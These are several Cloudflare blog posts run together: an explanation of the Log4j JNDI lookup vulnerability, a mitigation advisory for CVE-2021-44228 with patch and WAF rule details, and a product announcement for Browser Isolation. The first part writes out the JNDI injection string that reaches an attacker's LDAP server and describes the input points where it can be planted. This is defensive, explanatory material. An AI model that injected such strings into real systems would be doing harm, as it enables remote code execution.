LOG4J2-313 added a jndi Lookup as follows: “The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a “:” no prefix will be added.”

With a : present in the key, as in ${jndi:ldap://example.com/a} there’s no prefix and the LDAP server is queried for the object. And these Lookups can be used in both the configuration of log4j as well as when lines are logged.

So all an attacker has to do is find some input that gets logged and add something like  ${jndi:ldap://example.com/a}. This could be a common HTTP header like User-Agent (that commonly gets logged) or perhaps a form parameter like username that might also be logged.

This is likely very common in Java-based Internet facing software that uses log4j. More insidious is that non-Internet facing software that uses Java can also be exploitable as data gets passed from system to system. For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science and the exploit could get logged. This is why it is vital that all Java-based software that uses log4j version 2 is patched or has mitigations applied immediately. Even if the Internet-facing software is not written in Java it is possible that strings get passed to other systems that are in Java allowing the exploit to happen.

And Java is used for many more systems than just those that are Internet facing. For example, it’s not hard to imagine a package handling system that scans QR codes on boxes, or a contactless door key both being vulnerable if they are written in Java and use log4j. In one case a carefully crafted QR code might contain a postal address containing the exploit string; in the other a carefully programmed door key could contain the exploit and be logged by a system that keeps track of entries and exits.

And systems that do periodic work might pick up the exploit and log it later. So the exploit could lay dormant until some indexing, rollup, or archive process written in Java inadvertently logs the bad string. Hours or even days later.

Cloudflare Firewall Protection

Cloudflare rolled out protection for our customers using our Firewall in the form of rules that block the jndi Lookup in common locations in an HTTP request. This is detailed here. We have continued to refine these rules as attackers have modified their exploits and will continue to do so.

CVE-2021-44228 – Log4j RCE 0-day mitigation

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

CVE-2021-44228 - Log4j RCE 0-day mitigation

CVE-2021-44228 - Log4j RCE 0-day mitigation

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE).

This vulnerability is actively being exploited and anyone using Log4j should update to version 2.15.0 as soon as possible. The latest version can already be found on the Log4j download page.

If updating to the latest version is not possible, customers can also mitigate exploit attempts by setting the system property “log4j2.formatMsgNoLookups” to “true”; or by removing the JndiLookup class from the classpath. Java release 8u121 also protects against this remote code execution vector.

Customers using the Cloudflare WAF can also leverage three newly deployed rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4j Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4j Body LOG
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

Due to the risk of false positives, customers should immediately review Firewall Event logs and switch the Log4j Body and URL rules to BLOCK if none are found. The rule inspecting HTTP headers has been directly deployed with a default action of BLOCK to all WAF customers.

We are continuing to monitor the situation and will update any WAF managed rules accordingly.

More details on the vulnerability can be found on the official Log4j security page.

Who is affected

Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.

In all Log4j versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Introducing Cloudflare Browser Isolation beta

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/browser-beta/

Introducing Cloudflare Browser Isolation beta

Reimagining the Browser

Introducing Cloudflare Browser Isolation beta

Web browsers are the culprit behind 70% of endpoint compromises. The same application that connects users to the entire Internet also connects you to all of the potentially harmful parts of the Internet. It’s an open door to nearly every connected system on the planet, which is powerful and terrifying.

We also rely on browsers more than ever. Most applications that we use live in a browser and that will continue to increase. For more and more organizations, a corporate laptop is just a managed web browser machine.

To keep those devices safe, and the data they hold or access, enterprises have started to deploy “browser isolation” services where the browser itself doesn’t run on the machine. Instead, the browser runs on a virtual machine in a cloud provider somewhere. By running away from the device, threats from the browser stay on that virtual machine somewhere in the cloud.

However, most isolation solutions take one of two approaches that both ruin the convenience and flexibility of a web browser:

  • Record the isolated browser and send a live stream of it to the user, which is slow and makes it difficult to do basic things like input text to a form.
  • Unpack the webpage, inspect it, repack it and send it to the user – sometimes missing threats or more often failing to repack the webpage in a way that it still works.

Today, we’re excited to open up a beta of a third approach to keeping web browsing safe with Cloudflare Browser Isolation. Browser sessions run in sandboxed environments in Cloudflare data centers in 200 cities around the world, bringing the remote browser milliseconds away from the user so it feels like local web browsing.

Instead of streaming pixels to the user, Cloudflare Browser Isolation sends the final output of a browser’s web page rendering. The approach means that the only thing ever sent to the device is a package of draw commands to render the webpage, which also makes Cloudflare Browser Isolation compatible with any HTML5 compliant browser.

The result is a browser that just feels like a browser, while keeping threats far away from the device.

We’re inviting users to sign up for the beta today as part of Zero Trust week at Cloudflare. If you’re interested in signing up now, visit the bottom of this post. If you’d like to find out how this works, keep reading.

The unexpected universal productivity application

While it never quite became the replacement operating system Marc Andreessen predicted in 1995, the web browser is perhaps the most important application today on end-user devices. In the workplace, many people spend the majority of their at-work computer time entirely within a web browser connected to internal apps and external SaaS applications and services. As this has occurred, browsers have needed to become increasingly complex — to address the expanding richness of the web and the demands of modern web applications such as Office 365 and Google Workplace.

However, despite the pivotal and ubiquitous role of web browsers, they are the least controlled application in the enterprise. Businesses struggle to control how users interact with web browsers. It’s all too easy for a user to inadvertently download an infected file, install a malicious extension, upload sensitive company data or click a malicious zero-day link in an email or on a webpage.

Making the problem worse is the growing prevalence of BYOD. It makes it difficult to enforce which browsers are used or if they are properly patched. Mobile device management (MDM) is a step in the right direction, but just like the slow patching cycles of on-premise firewalls, MDM can often be too slow to protect against zero day threats. I’ve been the recipient of many mass emails from CISO’s reminding everyone to patch their browser and to do it right now because this time it’s “really important” (CVE-2019-5786).

Reimagining the browser

Earlier this week we announced Cloudflare One, which is our vision for the future of the corporate network. The fundamental approach we’ve taken is a blank sheet: to zero out all the assumptions of the old model (like castle-and-moat) and usher in a new model based on the complex nature of today’s corporate networking and the shift to Zero Trust, cloud-based networking-as-a-service.

It would be impossible to do this without thinking about the browser. Remote computing technologies have offered the promise of fixing the problems of the browser for some time — a future where anyone can benefit from the security and scale of cloud computing on their personal device. The reality has been that getting a generally performant solution is much more difficult than it sounds. It requires sending a user’s input over the Internet, computing that input, retrieving resources off the web, and then streaming them back to the user. And it all must occur in milliseconds, to create an illusion of using a local piece of software.

The general experience has been terrible, and many implementations have created nothing but angry emails and help-desk tickets for IT folks.

It is a tough problem, and it’s something we’ve been hard at work at solving. By delivering a vector-based stream that scales across any display size without requiring high bandwidth connections we’re able to reproduce the native browser experience remotely. Users experience the website as it was intended, without all the compatibility issues introduced by scrubbing HTML, CSS and JavaScript. And performance issues are aided tremendously by the fact that the managed browser is hosted only milliseconds away on our network.

How secure remote browsing fits in with Cloudflare for Teams

Before Cloudflare Browser Isolation, Cloudflare for Teams consisted of two core services:

Cloudflare Access creates a Zero Trust network perimeter that allows users to access corporate applications without needing to poke holes in their internal network with a legacy VPN appliance.

Cloudflare Gateway creates a Secure Web Gateway that protects users from threats on any website.

These tools are excellent for protecting private Internet properties from unauthorized access and web browsing activity from known malicious websites. But what about unknown and unforeseeable threats?

Cloudflare Browser Isolation answers this question by sandboxing a web browser in a remote container that is easily disposed of at the end of the user’s browsing session or when compromised.

Should an unknown threat such as a zero day vulnerability or malicious website exploit any of the hundreds of Web APIs, the attack is limited to a browser running in a supervised cloud environment leaving the end-user’s device unaffected.

The Network is the Computer®

Web browsers are the foundation that the shift to the cloud has been built on. It’s just that they’ve always run in the wrong place.

In the same way that it made no sense for a developer to run and maintain the hardware that their application runs on, the same exact case can be made for the other side of the cloud’s equation: the browser. Funnily enough, the solution is exactly the same: like the developer’s application, the browser needed to move to the cloud. However, as with all disruptions, it takes time and investment for the performance of the new technology to catch up to the old one. When AWS was first launched in 2006, the inherent limitations meant that for most developers, it made sense to continue to run on-premise solutions.

At some point though, the technology improves to the point where the disruption can start taking over from the previous paradigm.

The limiting factor until today for a cloud-based browser has often been the experience of using it. A user’s experience is limited by the speed of light; it limits the time it takes a user’s input to travel to the remote data center and be returned to their display. In a perfect world, this needs to occur within milliseconds to deliver a real time experience.

Cloudflare has one very big advantage in solving that problem.

Introducing Cloudflare Browser Isolation beta

To deliver real-time remote computing experiences, each of our 200+ data centers are capable of serving remote browsing sessions within the blink of an eye of nearly everyone connected to the Internet. This allows us to deliver a low latency, responsive stream of a webpage regardless of where you’re physically located.

What’s next?

But that’s enough talking about it. We’d love for you to try it! Please complete the form here to sign up to be one of the first users of this new technology in our network. We’ll be in touch as we expand the beta to more users.